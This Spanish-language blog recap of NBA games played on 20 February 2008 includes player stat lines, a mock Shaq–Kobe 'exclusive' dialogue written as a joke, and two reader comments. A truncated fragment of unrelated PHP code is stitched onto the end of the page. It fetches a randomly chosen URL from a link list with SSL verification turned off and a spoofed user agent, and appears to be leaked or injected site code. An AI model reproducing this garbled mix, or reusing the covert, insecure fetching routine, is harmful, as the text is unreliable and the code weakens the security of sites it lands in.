La crónica (20/02/08)

21 de February de 2008 por MagicJohnson32

Espectacular jornada la vivida anoche en la NBA. Emoción, tanteos altísimos, actuaciones descomunales, debuts esperadísimos, enfrentamientos repletos de morbo… Os lo contamos todo, y más, en nuestra crónica. Antes, veamos la canasta de la noche:

La crónica:boshhowardrapsmagic

Para empezar, los Sixers destrozaron a los Knicks 84-124, un partido en el que la ventaja local ya era de 38 puntos al descanso. El Magic-Raptors fue una exhibición ofensiva, especialmente por parte de Howard y Bosh. Los 37 puntos con 13 de 16 en tiros y 15 rebotes (10 de ellos ofensivos) del primero los respondió el segundo con 40-5-5 y 14 de 16 en tiros. El triunfo fue para los canadienses por 110-127, de nuevo con un gran Calderón. En Indianapolis, esta vez el triple-doble de LeBron sí sirvió para dar a su equipo la victoria. Los 31-14-12 de James se vieron mejor acompañados que la noche anterior y los Cavs superaron a los Pacers por 106-97. Por su parte, los Nets iniciaron la era post Kidd con un apurado triunfo 102-110 en la prórroga contra los Bulls, con destacadas actuaciones de Carter, Jefferson y Marcus Williams, que aprovechó la ocasión como titular. En los Bulls, 8 jugadores anotaron 10 o más puntos, entre ellos Gordon y Deng, ambos suplentes.

dirkjasondallasnoConfirmado: a los Pistons les ha sentado fatal el parón del All-Star. Dos partidos y dos derrotas, la de anoche en Milwaukee pese a los 34 puntos de Billups. Los Bucks estuvieron cerca de desaprovechar una renta de 21 puntos pero al final se anotaron la victoria por 98-103. En New Orleans, Chris Paul se encargó de darle la bienvenida a Jason Kidd y darle una muestra de lo que se puede encontrar en los Playoffs del Oeste: 31 puntos, 11 asistencias, 9 robos y 5 rebotes de CP3 condujeron a los Hornets a la victoria 93-104 ante los Mavs, en los que Kidd fue titular pero se quedó en 8 puntos, 6 rebotes, 5 asistencias y 6 pérdidas. Peor aun estuvo Josh Howard mientras que sí brilló Nowitzki con 31-8.

Aunque el debut con más morbo se dio en Phoenix. Shaquille O’Neal disputó sus primeros minutos como Sun ante, por supuesto, los Lakers. Por si fuera poco, estaba en juego el liderato de la Pacific y el balance en las series entre ambos equipos, que era favorable a los angelinos 2-1. El encargado de aguar la fiesta de Shaq fue, como era de prever, Kobe Bryant, quien anotó 41 puntos con magníficos porcentajes y comandó el triunfo de los Lakers por 130-124. Gasol volvió a ser determinante con 29 puntos, Odom alargó su gran momento con 22-11 mientras que Amare fue el mejor de los locales con 37-15. O’Neal, por su parte, mostró un estado de forma relativamente bueno y consiguió 15 puntos y 9 rebotes.

barondavisclutchceltics Más morbo: Bibby, en su segundo partido como jugador de los Hawks, visitaba Sacramento, su único equipo en la NBA hasta hace unos días. Artest, Martin y Udrih impidieron que Bibby, autor de 17 puntos, se llevase la victoria del ARCO con un tanteo final de 107-119. En Los Angeles, los Grizzlies prosiguieron con su línea negativa y sólo Gay, Warrick, Navarro y Conley se salvaron en un horrible partido ante los Clippers, que vencieron 86-100 liderados por Corey Maggette.

Por último, Baron Davis hizo ante los Celtics lo que mejor sabe: decidir un partido. Una canasta suya a 0.3 segundos para el final dio la victoria a los Warriors por 117-119 ante unos Celtics que han bajado alarmantemente el nivel defensivo que les catapultó a un balance de récord. Davis, Ellis, Biedrins y Harrington lograron más de 20 puntos, mientras que Garnett mejoró pero sigue sin alcanzar su nivel de juego, y fueron Allen y Pierce los encargados de llevar el peso de su equipo.

Nuestro MVP: Chris Bosh, Kobe Bryant, Dwight Horward, Corey Maggette, Dirk Nowitzki… Todos, pese a realizar enormes partidos hoy, palidecen antelebrontripledoublepacers el gran LeBron, que se ha marcado otro triple-doble (31-14-12), y el que seguramente será su principal rival en la lucha por el MVP, Chris Paul, que ha anotado 31 puntos, repartido 11 asistencias y robado 9 balones delante de un tal Jason Kidd.

El rookie: Al Horford sigue con sus doble-dobles (12-12 anoche), pero Thaddeus Young ha sido el mejor de Philadelphia con 20 puntos y 8 rebotes.

La sorpresa: Carlos Delfino y Sasha Vujacic han contribuido con buenas actuaciones a las importantes victorias de sus respectivos equipos pero la sorpresa agradable del día es el buen partido de Marcus Williams como base titular de los New Jersey ahora que Jason Kidd no está. A priori Devin Harris parece que será el base titular pero no lo demos aún por hecho.

La decepción: Impresionante partido del juego interior de los Memphis Grizzlies. Milicic, 0 de 7 en 20 minutos de juego, y su sustituto, Jason Collins, no se dignó a tirar en los 25 minutos que estuvo en pista y tan solo recogió 1 rebote. Ver para creer.

Primicia TJ: nuestro servicio de investigación tuvo acceso a la conversación que se produjo entre Shaquille O’Neal y Kobe Bryant en la previa del Suns-Lakers de anoche. A continuación la transcribimos y os la ofrecemos en absoluta primicia.

shaqkobesunslakers

Kobe: “¿Sabes aquello que dije de que eres un gordo sin la más mínima profesionalidad? ¡¡Pues era broma!!”

Shaq: “¿Y recuerdas tú cuando te llamé payaso y chupón? ¡No iba en serio!”

Kobe: “Bah, ya sabes, los periodistas, que no saben captar una coña”

Shaq: “Qué me vas a contar”

Kobe: “Paz, tío”

Shaq: “Que te f… digoooo, paz, tío”

Comenta

2 comentarios a esta entrada

  1. telekoman dice:
    #1

    jajajaja. Que buena la primicia.

    A todo esto, que buenos son los Lakers de ahora mismo. Veremos los roles cuando vuelva Bynum, pero de momento equipazo.

      Citar

  2. RusticoColorao dice:
    #2

    Estuve viendo alguno de los partidos…
    Calde realmente es bueno y lo mejor es que sus compañeros juegan muy relajados con él en pista…otro partidazo junto con el del amigo Bosh. Por Orlando esta vez el turco no estuvo muy fino y eso se notó.

    En NO…vaya partido más lamentable de Josh Howard uff…pero es que Paul se comió a Kidd, que ojo no estuvo mal…pero vaya como está CP3

    LA juega en ataque sobrado…vaya maravilla. A mi me encanta su segunda unidad…Farmar, Vujacic, Farmar, Turiaf…siempre abren algo de hueco. Vaya como sufre el gordo en esos ataques tan rápidos madre mía…Ahhh la defensa angelina inexistente.

    Chicago…paso de comentar nada ufffff

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>